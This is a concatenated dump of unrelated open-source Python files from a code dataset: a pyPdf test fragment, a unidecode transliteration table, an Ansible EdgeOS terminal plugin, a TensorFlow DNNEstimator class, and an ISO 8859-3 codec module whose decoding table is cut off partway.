# input1 = PdfFileReader(file("test\\5000-s1-05e.pdf", "rb"))
# page1 = input1.getPage(0)
#
# input2 = PdfFileReader(file("test\\PDFReference16.pdf", "rb"))
# page2 = input2.getPage(0)
# page3 = input2.getPage(1)
# page1.mergePage(page2)
# page1.mergePage(page3)
#
# input3 = PdfFileReader(file("test\\cc-cc.pdf", "rb"))
# page1.mergePage(input3.getPage(0))
#
# page1.compressContentStreams()
#
# output.addPage(page1)
# output.write(file("test\\merge-test.pdf", "wb"))
| mit |
adaur/SickRage | lib/unidecode/x08f.py | 252 | 4651 | data = (
'Er ', # 0x00
'Qiong ', # 0x01
'Ju ', # 0x02
'Jiao ', # 0x03
'Guang ', # 0x04
'Lu ', # 0x05
'Kai ', # 0x06
'Quan ', # 0x07
'Zhou ', # 0x08
'Zai ', # 0x09
'Zhi ', # 0x0a
'She ', # 0x0b
'Liang ', # 0x0c
'Yu ', # 0x0d
'Shao ', # 0x0e
'You ', # 0x0f
'Huan ', # 0x10
'Yun ', # 0x11
'Zhe ', # 0x12
'Wan ', # 0x13
'Fu ', # 0x14
'Qing ', # 0x15
'Zhou ', # 0x16
'Ni ', # 0x17
'Ling ', # 0x18
'Zhe ', # 0x19
'Zhan ', # 0x1a
'Liang ', # 0x1b
'Zi ', # 0x1c
'Hui ', # 0x1d
'Wang ', # 0x1e
'Chuo ', # 0x1f
'Guo ', # 0x20
'Kan ', # 0x21
'Yi ', # 0x22
'Peng ', # 0x23
'Qian ', # 0x24
'Gun ', # 0x25
'Nian ', # 0x26
'Pian ', # 0x27
'Guan ', # 0x28
'Bei ', # 0x29
'Lun ', # 0x2a
'Pai ', # 0x2b
'Liang ', # 0x2c
'Ruan ', # 0x2d
'Rou ', # 0x2e
'Ji ', # 0x2f
'Yang ', # 0x30
'Xian ', # 0x31
'Chuan ', # 0x32
'Cou ', # 0x33
'Qun ', # 0x34
'Ge ', # 0x35
'You ', # 0x36
'Hong ', # 0x37
'Shu ', # 0x38
'Fu ', # 0x39
'Zi ', # 0x3a
'Fu ', # 0x3b
'Wen ', # 0x3c
'Ben ', # 0x3d
'Zhan ', # 0x3e
'Yu ', # 0x3f
'Wen ', # 0x40
'Tao ', # 0x41
'Gu ', # 0x42
'Zhen ', # 0x43
'Xia ', # 0x44
'Yuan ', # 0x45
'Lu ', # 0x46
'Jiu ', # 0x47
'Chao ', # 0x48
'Zhuan ', # 0x49
'Wei ', # 0x4a
'Hun ', # 0x4b
'Sori ', # 0x4c
'Che ', # 0x4d
'Jiao ', # 0x4e
'Zhan ', # 0x4f
'Pu ', # 0x50
'Lao ', # 0x51
'Fen ', # 0x52
'Fan ', # 0x53
'Lin ', # 0x54
'Ge ', # 0x55
'Se ', # 0x56
'Kan ', # 0x57
'Huan ', # 0x58
'Yi ', # 0x59
'Ji ', # 0x5a
'Dui ', # 0x5b
'Er ', # 0x5c
'Yu ', # 0x5d
'Xian ', # 0x5e
'Hong ', # 0x5f
'Lei ', # 0x60
'Pei ', # 0x61
'Li ', # 0x62
'Li ', # 0x63
'Lu ', # 0x64
'Lin ', # 0x65
'Che ', # 0x66
'Ya ', # 0x67
'Gui ', # 0x68
'Xuan ', # 0x69
'Di ', # 0x6a
'Ren ', # 0x6b
'Zhuan ', # 0x6c
'E ', # 0x6d
'Lun ', # 0x6e
'Ruan ', # 0x6f
'Hong ', # 0x70
'Ku ', # 0x71
'Ke ', # 0x72
'Lu ', # 0x73
'Zhou ', # 0x74
'Zhi ', # 0x75
'Yi ', # 0x76
'Hu ', # 0x77
'Zhen ', # 0x78
'Li ', # 0x79
'Yao ', # 0x7a
'Qing ', # 0x7b
'Shi ', # 0x7c
'Zai ', # 0x7d
'Zhi ', # 0x7e
'Jiao ', # 0x7f
'Zhou ', # 0x80
'Quan ', # 0x81
'Lu ', # 0x82
'Jiao ', # 0x83
'Zhe ', # 0x84
'Fu ', # 0x85
'Liang ', # 0x86
'Nian ', # 0x87
'Bei ', # 0x88
'Hui ', # 0x89
'Gun ', # 0x8a
'Wang ', # 0x8b
'Liang ', # 0x8c
'Chuo ', # 0x8d
'Zi ', # 0x8e
'Cou ', # 0x8f
'Fu ', # 0x90
'Ji ', # 0x91
'Wen ', # 0x92
'Shu ', # 0x93
'Pei ', # 0x94
'Yuan ', # 0x95
'Xia ', # 0x96
'Zhan ', # 0x97
'Lu ', # 0x98
'Che ', # 0x99
'Lin ', # 0x9a
'Xin ', # 0x9b
'Gu ', # 0x9c
'Ci ', # 0x9d
'Ci ', # 0x9e
'Pi ', # 0x9f
'Zui ', # 0xa0
'Bian ', # 0xa1
'La ', # 0xa2
'La ', # 0xa3
'Ci ', # 0xa4
'Xue ', # 0xa5
'Ban ', # 0xa6
'Bian ', # 0xa7
'Bian ', # 0xa8
'Bian ', # 0xa9
'[?] ', # 0xaa
'Bian ', # 0xab
'Ban ', # 0xac
'Ci ', # 0xad
'Bian ', # 0xae
'Bian ', # 0xaf
'Chen ', # 0xb0
'Ru ', # 0xb1
'Nong ', # 0xb2
'Nong ', # 0xb3
'Zhen ', # 0xb4
'Chuo ', # 0xb5
'Chuo ', # 0xb6
'Suberu ', # 0xb7
'Reng ', # 0xb8
'Bian ', # 0xb9
'Bian ', # 0xba
'Sip ', # 0xbb
'Ip ', # 0xbc
'Liao ', # 0xbd
'Da ', # 0xbe
'Chan ', # 0xbf
'Gan ', # 0xc0
'Qian ', # 0xc1
'Yu ', # 0xc2
'Yu ', # 0xc3
'Qi ', # 0xc4
'Xun ', # 0xc5
'Yi ', # 0xc6
'Guo ', # 0xc7
'Mai ', # 0xc8
'Qi ', # 0xc9
'Za ', # 0xca
'Wang ', # 0xcb
'Jia ', # 0xcc
'Zhun ', # 0xcd
'Ying ', # 0xce
'Ti ', # 0xcf
'Yun ', # 0xd0
'Jin ', # 0xd1
'Hang ', # 0xd2
'Ya ', # 0xd3
'Fan ', # 0xd4
'Wu ', # 0xd5
'Da ', # 0xd6
'E ', # 0xd7
'Huan ', # 0xd8
'Zhe ', # 0xd9
'Totemo ', # 0xda
'Jin ', # 0xdb
'Yuan ', # 0xdc
'Wei ', # 0xdd
'Lian ', # 0xde
'Chi ', # 0xdf
'Che ', # 0xe0
'Ni ', # 0xe1
'Tiao ', # 0xe2
'Zhi ', # 0xe3
'Yi ', # 0xe4
'Jiong ', # 0xe5
'Jia ', # 0xe6
'Chen ', # 0xe7
'Dai ', # 0xe8
'Er ', # 0xe9
'Di ', # 0xea
'Po ', # 0xeb
'Wang ', # 0xec
'Die ', # 0xed
'Ze ', # 0xee
'Tao ', # 0xef
'Shu ', # 0xf0
'Tuo ', # 0xf1
'Kep ', # 0xf2
'Jing ', # 0xf3
'Hui ', # 0xf4
'Tong ', # 0xf5
'You ', # 0xf6
'Mi ', # 0xf7
'Beng ', # 0xf8
'Ji ', # 0xf9
'Nai ', # 0xfa
'Yi ', # 0xfb
'Jie ', # 0xfc
'Zhui ', # 0xfd
'Lie ', # 0xfe
'Xun ', # 0xff
)
| gpl-3.0 |
nhicher/ansible | lib/ansible/plugins/terminal/edgeos.py | 87 | 1126 | # Copyright: (c) 2018, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import re
from ansible.plugins.terminal import TerminalBase
from ansible.errors import AnsibleConnectionFailure
class TerminalModule(TerminalBase):
    """Terminal plugin for EdgeOS devices: provides the prompt/error
    patterns used to delimit CLI output and prepares the shell on open."""
    # Patterns matched against the end of received output to detect an
    # EdgeOS prompt (operational '>' or configuration '#' mode).
    terminal_stdout_re = [
        re.compile(br"[\r\n]?[\w+\-\.:\/\[\]]+(?:\([^\)]+\)){,3}(?:>|#) ?$"),
        re.compile(br"\@[\w\-\.]+:\S+?[>#\$] ?$")
    ]
    # Patterns indicating the device rejected or failed a command.
    terminal_stderr_re = [
        re.compile(br"\n\s*command not found"),
        re.compile(br"\nInvalid command"),
        re.compile(br"\nCommit failed"),
        re.compile(br"\n\s*Set failed"),
    ]
    # Rows requested via 'stty' below; overridable through the environment.
    # NOTE(review): os.getenv returns a *string* when the variable is set
    # and the int default 10000 otherwise -- both work with %s formatting.
    terminal_length = os.getenv('ANSIBLE_EDGEOS_TERMINAL_LENGTH', 10000)
    def on_open_shell(self):
        """Disable paging and set the terminal length once a shell opens.

        Raises:
            AnsibleConnectionFailure: if either setup command fails.
        """
        try:
            self._exec_cli_command('export VYATTA_PAGER=cat')
            self._exec_cli_command('stty rows %s' % self.terminal_length)
        except AnsibleConnectionFailure:
            raise AnsibleConnectionFailure('unable to set terminal parameters')
| gpl-3.0 |
meteorcloudy/tensorflow | tensorflow/contrib/estimator/python/estimator/dnn.py | 1 | 6739 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Deep Neural Network estimators."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.estimator import estimator
from tensorflow.python.estimator.canned import dnn as dnn_lib
from tensorflow.python.ops import nn
class DNNEstimator(estimator.Estimator):
  """An estimator for TensorFlow DNN models with user-specified head.
  Example:
  ```python
  sparse_feature_a = sparse_column_with_hash_bucket(...)
  sparse_feature_b = sparse_column_with_hash_bucket(...)
  sparse_feature_a_emb = embedding_column(sparse_id_column=sparse_feature_a,
                                          ...)
  sparse_feature_b_emb = embedding_column(sparse_id_column=sparse_feature_b,
                                          ...)
  estimator = DNNEstimator(
      head=tf.contrib.estimator.multi_label_head(n_classes=3),
      feature_columns=[sparse_feature_a_emb, sparse_feature_b_emb],
      hidden_units=[1024, 512, 256])
  # Or estimator using the ProximalAdagradOptimizer optimizer with
  # regularization.
  estimator = DNNEstimator(
      head=tf.contrib.estimator.multi_label_head(n_classes=3),
      feature_columns=[sparse_feature_a_emb, sparse_feature_b_emb],
      hidden_units=[1024, 512, 256],
      optimizer=tf.train.ProximalAdagradOptimizer(
        learning_rate=0.1,
        l1_regularization_strength=0.001
      ))
  # Or estimator using an optimizer with a learning rate decay.
  estimator = DNNEstimator(
      head=tf.contrib.estimator.multi_label_head(n_classes=3),
      feature_columns=[sparse_feature_a_emb, sparse_feature_b_emb],
      hidden_units=[1024, 512, 256],
      optimizer=lambda: tf.AdamOptimizer(
          learning_rate=tf.exponential_decay(
              learning_rate=0.1,
              global_step=tf.get_global_step(),
              decay_steps=10000,
              decay_rate=0.96))
  # Or estimator with warm-starting from a previous checkpoint.
  estimator = DNNEstimator(
      head=tf.contrib.estimator.multi_label_head(n_classes=3),
      feature_columns=[sparse_feature_a_emb, sparse_feature_b_emb],
      hidden_units=[1024, 512, 256],
      warm_start_from="/path/to/checkpoint/dir")
  # Input builders
  def input_fn_train: # returns x, y
    pass
  estimator.train(input_fn=input_fn_train, steps=100)
  def input_fn_eval: # returns x, y
    pass
  metrics = estimator.evaluate(input_fn=input_fn_eval, steps=10)
  def input_fn_predict: # returns x, None
    pass
  predictions = estimator.predict(input_fn=input_fn_predict)
  ```
  Input of `train` and `evaluate` should have following features,
  otherwise there will be a `KeyError`:
  * if `weight_column` is not `None`, a feature with
    `key=weight_column` whose value is a `Tensor`.
  * for each `column` in `feature_columns`:
    - if `column` is a `_CategoricalColumn`, a feature with `key=column.name`
      whose `value` is a `SparseTensor`.
    - if `column` is a `_WeightedCategoricalColumn`, two features: the first
      with `key` the id column name, the second with `key` the weight column
      name. Both features' `value` must be a `SparseTensor`.
    - if `column` is a `_DenseColumn`, a feature with `key=column.name`
      whose `value` is a `Tensor`.
  Loss and predicted output are determined by the specified head.
  """
  def __init__(self,
               head,
               hidden_units,
               feature_columns,
               model_dir=None,
               optimizer='Adagrad',
               activation_fn=nn.relu,
               dropout=None,
               input_layer_partitioner=None,
               config=None,
               warm_start_from=None):
    """Initializes a `DNNEstimator` instance.
    Args:
      head: A `_Head` instance constructed with a method such as
        `tf.contrib.estimator.multi_label_head`.
      hidden_units: Iterable of number hidden units per layer. All layers are
        fully connected. Ex. `[64, 32]` means first layer has 64 nodes and
        second one has 32.
      feature_columns: An iterable containing all the feature columns used by
        the model. All items in the set should be instances of classes derived
        from `_FeatureColumn`.
      model_dir: Directory to save model parameters, graph and etc. This can
        also be used to load checkpoints from the directory into a estimator to
        continue training a previously saved model.
      optimizer: An instance of `tf.Optimizer` used to train the model. Can also
        be a string (one of 'Adagrad', 'Adam', 'Ftrl', 'RMSProp', 'SGD'), or
        callable. Defaults to Adagrad optimizer.
      activation_fn: Activation function applied to each layer. If `None`, will
        use `tf.nn.relu`.
      dropout: When not `None`, the probability we will drop out a given
        coordinate.
      input_layer_partitioner: Optional. Partitioner for input layer. Defaults
        to `min_max_variable_partitioner` with `min_slice_size` 64 << 20.
      config: `RunConfig` object to configure the runtime settings.
      warm_start_from: A string filepath to a checkpoint to warm-start from, or
        a `WarmStartSettings` object to fully configure warm-starting. If the
        string filepath is provided instead of a `WarmStartSettings`, then all
        weights are warm-started, and it is assumed that vocabularies and Tensor
        names are unchanged.
    """
    # Closure over the constructor arguments; the base Estimator calls this
    # with (features, labels, mode, config) at train/eval/predict time.
    def _model_fn(features, labels, mode, config):
      # Delegate to the canned DNN model function, injecting the
      # user-supplied head in place of the canned one.
      return dnn_lib._dnn_model_fn(  # pylint: disable=protected-access
          features=features,
          labels=labels,
          mode=mode,
          head=head,
          hidden_units=hidden_units,
          feature_columns=tuple(feature_columns or []),
          optimizer=optimizer,
          activation_fn=activation_fn,
          dropout=dropout,
          input_layer_partitioner=input_layer_partitioner,
          config=config)
    super(DNNEstimator, self).__init__(
        model_fn=_model_fn, model_dir=model_dir, config=config,
        warm_start_from=warm_start_from)
| apache-2.0 |
damonkohler/sl4a | python/src/Lib/encodings/iso8859_3.py | 593 | 13345 | """ Python Character Mapping Codec iso8859_3 generated from 'MAPPINGS/ISO8859/8859-3.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
    """Stateless ISO 8859-3 codec built on the charmap tables in this
    module (file generated by gencodec.py)."""
    def encode(self,input,errors='strict'):
        # Maps each character through encoding_table; 'errors' follows the
        # standard codec error-handling scheme ('strict', 'replace', ...).
        return codecs.charmap_encode(input,errors,encoding_table)
    def decode(self,input,errors='strict'):
        # Inverse mapping via decoding_table; returns (text, length consumed).
        return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
    """Incremental encoder; charmap encoding is stateless, so each chunk
    is encoded independently of previous chunks."""
    def encode(self, input, final=False):
        # [0] drops the "characters consumed" count from the codec result.
        return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
    """Incremental decoder; charmap decoding is stateless, so each chunk
    is decoded independently of previous chunks."""
    def decode(self, input, final=False):
        # [0] drops the "bytes consumed" count from the codec result.
        return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
    # Stream support comes entirely from Codec.encode plus the generic
    # codecs.StreamWriter machinery; no extra behavior is needed.
    pass
class StreamReader(Codec,codecs.StreamReader):
    # Stream support comes entirely from Codec.decode plus the generic
    # codecs.StreamReader machinery; no extra behavior is needed.
    pass
### encodings module API
def getregentry():
    """Return the CodecInfo record through which the 'encodings' package
    registers this codec under the name 'iso8859-3'."""
    return codecs.CodecInfo(
        name='iso8859-3',
        encode=Codec().encode,
        decode=Codec().decode,
        incrementalencoder=IncrementalEncoder,
        incrementaldecoder=IncrementalDecoder,
        streamreader=StreamReader,
        streamwriter=StreamWriter,
    )
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> NULL
u'\x01' # 0x01 -> START OF HEADING
u'\x02' # 0x02 -> START OF TEXT
u'\x03' # 0x03 -> END OF TEXT
u'\x04' # 0x04 -> END OF TRANSMISSION
u'\x05' # 0x05 -> ENQUIRY
u'\x06' # 0x06 -> ACKNOWLEDGE
u'\x07' # 0x07 -> BELL
u'\x08' # 0x08 -> BACKSPACE
u'\t' # 0x09 -> HORIZONTAL TABULATION
u'\n' # 0x0A -> LINE FEED
u'\x0b' # 0x0B -> VERTICAL TABULATION
u'\x0c' # 0x0C -> FORM FEED
u'\r' # 0x0D -> CARRIAGE RETURN
u'\x0e' # 0x0E -> SHIFT OUT
u'\x0f' # 0x0F -> SHIFT IN
u'\x10' # 0x10 -> DATA LINK ESCAPE
u'\x11' # 0x11 -> DEVICE CONTROL ONE
u'\x12' # 0x12 -> DEVICE CONTROL TWO
u'\x13' # 0x13 -> DEVICE CONTROL THREE
u'\x14' # 0x14 -> DEVICE CONTROL FOUR
u'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x16 -> SYNCHRONOUS IDLE
u'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x18 -> CANCEL
u'\x19' # 0x19 -> END OF MEDIUM
u'\x1a' # 0x1A -> SUBSTITUTE
u'\x1b' # 0x1B -> ESCAPE
u'\x1c' # 0x1C -> FILE SEPARATOR
u'\x1d' # 0x1D -> GROUP SEPARATOR
u'\x1e' # 0x1E -> RECORD SEPARATOR
u'\x1f' # 0x1F -> UNIT SEPARATOR
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> DELETE
u'\x80' # 0x80 -> <control>
u'\x81' # 0x81 -> <control>
u'\x82' # 0x82 -> <control>
u'\x83' # 0x83 -> <control>
u'\x84' # 0x84 -> <control>
u'\x85' # 0x85 -> <control>
u'\x86' # 0x86 -> <control>
u'\x87' # 0x87 -> <control>
u'\x88' # 0x88 -> <control>
u'\x89' # 0x89 -> <control>
u'\x8a' # 0x8A -> <control>
u'\x8b' # 0x8B -> <control>
u'\x8c' # 0x8C -> <control>
u'\x8d' # 0x8D -> <control>
u'\x8e' # 0x8E -> <control>
u'\x8f' # 0x8F -> <control>
u'\x90' # 0x90 -> <control>
u'\x91' # 0x91 -> <control>
u'\x92' # 0x92 -> <control>
u'\x93' # 0x93 -> <control>
u'\x94' # 0x94 -> <control>
u'\x95' # 0x95 -> <control>
u'\x96' # 0x96 -> <control>
u'\x97' # 0x97 -> <control>
u'\x98' # 0x98 -> <control>
u'\x99' # 0x99 -> <control>
u'\x9a' # 0x9A -> <control>
u'\x9b' # 0x9B -> <control>
u'\x9c' # 0x9C -> <control>
u'\x9d' # 0x9D -> <control>
u'\x9e' # 0x9E -> <control>
u'\x9f' # 0x9F -> <control>
u'\xa0' # 0xA0 -> NO-BREAK SPACE
u'\u0126' # 0xA1 -> LATIN CAPITAL LETTER H WITH STROKE
u'\u02d8' # 0xA2 -> BREVE
u'\xa3' # 0xA3 -> POUND SIGN
u'\xa4' # 0xA4 -> CURRENCY SIGN
u'\ufffe'
u'\u0124' # 0xA6 -> LATIN CAPITAL LETTER H WITH CIRCUMFLEX
u'\xa7' # 0xA7 -> SECTION SIGN
u'\xa8' # 0xA8 -> DIAERESIS
u'\u0130' # 0xA9 -> LATIN CAPITAL LETTER I WITH DOT ABOVE
u'\u015e' # 0xAA -> LATIN CAPITAL LETTER S WITH CEDILLA
u'\u011e' # 0xAB -> LATIN CAPITAL LETTER G WITH BREVE
u'\u0134' # 0xAC -> LATIN CAPITAL LETTER J WITH CIRCUMFLEX
u'\xad' # 0xAD -> SOFT HYPHEN
u'\ufffe'
u'\u017b' # 0xAF -> LATIN CAPITAL LETTER Z WITH DOT ABOVE
u'\xb0' # 0xB0 -> DEGREE SIGN
u'\u0127' # 0xB1 -> LATIN SMALL LETTER H WITH STROKE
u'\xb2' # 0xB2 -> SUPERSCRIPT TWO
u'\xb3' # 0xB3 -> SUPERSCRIPT THREE
u'\xb4' # 0xB4 -> ACUTE ACCENT
u'\xb5' # 0xB5 -> MICRO SIGN
u'\u0125' # 0xB6 -> LATIN SMALL LETTER H WITH CIRCUMFLEX
u'\xb7' # 0xB7 -> MIDDLE DOT
u'\xb8' # 0xB8 -> CEDILLA
u'\u0131' # 0xB9 -> LATIN SMALL LETTER DOTLESS I
u'\u015f' # 0xBA -> LATIN SMALL LETTER S WITH CEDILLA
u'\u011f' # 0xBB -> LATIN SMALL LETTER G WITH BREVE
u'\u0135' # 0xBC -> LATIN SMALL LETTER J WITH CIRCUMFLEX
u'\xbd' # 0xBD -> VULGAR FRACTION ONE HALF
u'\ufffe'
u'\u017c' # 0xBF -> LATIN SMALL LETTER Z WITH DOT ABOVE
u'\xc0' # 0xC0 -> LATIN CAPITAL LETTER A WITH GRAVE
u'\xc1' # 0xC1 -> LATIN CAPITAL LETTER A WITH ACUTE
u'\xc2' # 0xC2 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
u'\ufffe'
u'\xc4' # 0xC4 -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\u010a' # 0xC5 -> LATIN CAPITAL LETTER C WITH DOT ABOVE
u'\u0108' # 0xC6 -> LATIN CAPITAL LETTER C WITH CIRCUMFLEX
u'\xc7' # 0xC7 -> LATIN CAPITAL LETTER C WITH CEDILLA
u'\xc8' # 0xC8 -> LATIN CAPITAL LETTER E WITH GRAVE
u'\xc9' # 0xC9 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\xca' # 0xCA -> LATIN CAPITAL LETTER E WITH CIRCUMFLEX
u'\xcb' # 0xCB -> LATIN CAPITAL LETTER E WITH DIAERESIS
u'\xcc' # 0xCC -> LATIN CAPITAL LETTER I WITH GRAVE
u'\xcd' # 0xCD -> LATIN CAPITAL LETTER I WITH ACUTE
u'\xce' # 0xCE -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
u'\xcf' # 0xCF -> LATIN CAPITAL LETTER I WITH DIAERESIS
u'\ufffe'
u'\xd1' # 0xD1 -> LATIN CAPITAL LETTER N WITH TILDE
u'\xd2' # 0xD2 -> LATIN CAPITAL LETTER O WITH GRAVE
u'\xd3' # 0xD3 -> LATIN CAPITAL LETTER O WITH ACUTE
u'\xd4' # 0xD4 -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
u'\u0120' # 0xD5 -> LATIN CAPITAL LETTER G WITH DOT ABOVE
u'\xd6' # 0xD6 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xd7' # 0xD7 -> MULTIPLICATION SIGN
u'\u011c' # 0xD8 -> LATIN CAPITAL LETTER G WITH CIRCUMFLEX
u'\xd9' # 0xD9 -> LATIN CAPITAL LETTER U WITH GRAVE
u'\xda' # 0xDA -> LATIN CAPITAL LETTER U WITH ACUTE
u'\xdb' # 0xDB -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX
u'\xdc' # 0xDC -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\u016c' # 0xDD -> LATIN CAPITAL LETTER U WITH BREVE
u'\u015c' # 0xDE -> LATIN CAPITAL LETTER S WITH CIRCUMFLEX
u'\xdf' # 0xDF -> LATIN SMALL LETTER SHARP S
u'\xe0' # 0xE0 -> LATIN SMALL LETTER A WITH GRAVE
u'\xe1' # 0xE1 -> LATIN SMALL LETTER A WITH ACUTE
u'\xe2' # 0xE2 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
u'\ufffe'
u'\xe4' # 0xE4 -> LATIN SMALL LETTER A WITH DIAERESIS
u'\u010b' # 0xE5 -> LATIN SMALL LETTER C WITH DOT ABOVE
u'\u0109' # 0xE6 -> LATIN SMALL LETTER C WITH CIRCUMFLEX
u'\xe7' # 0xE7 -> LATIN SMALL LETTER C WITH CEDILLA
u'\xe8' # 0xE8 -> LATIN SMALL LETTER E WITH GRAVE
u'\xe9' # 0xE9 -> LATIN SMALL LETTER E WITH ACUTE
u'\xea' # 0xEA -> LATIN SMALL LETTER E WITH CIRCUMFLEX
u'\xeb' # 0xEB -> LATIN SMALL LETTER E WITH DIAERESIS
u'\xec' # 0xEC -> LATIN SMALL LETTER I WITH GRAVE
u'\xed' # 0xED -> LATIN SMALL LETTER I WITH ACUTE
u'\xee' # 0xEE -> LATIN SMALL LETTER I WITH CIRCUMFLEX
u'\xef' # 0xEF -> LATIN SMALL LETTER I WITH DIAERESIS
u'\ufffe'
u'\xf1' # 0xF1 -> LATIN SMALL LETTER N WITH TILDE
u'\xf2' # 0xF2 -> LATIN SMALL LETTER O WITH GRAVE
u'\xf3' # 0xF3 -> LATIN SMALL LETTER O WITH ACUTE
u'\xf4' # 0xF4 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
u'\u0121' # 0xF5 -> LATIN SMALL LETTER G WITH DOT ABOVE
u'\xf6' # 0xF6 -> LATIN SMALL LETTER O WITH DIAERESIS
u'\xf7' # 0xF7 -> DIVISION SIGN
u'\u011d' # 0xF8 -> LATIN SMALL LETTER G WITH CIRCUMFLEX
u'\xf9' # 0xF9 -> LATIN SMALL LETTER U WITH GRAVE
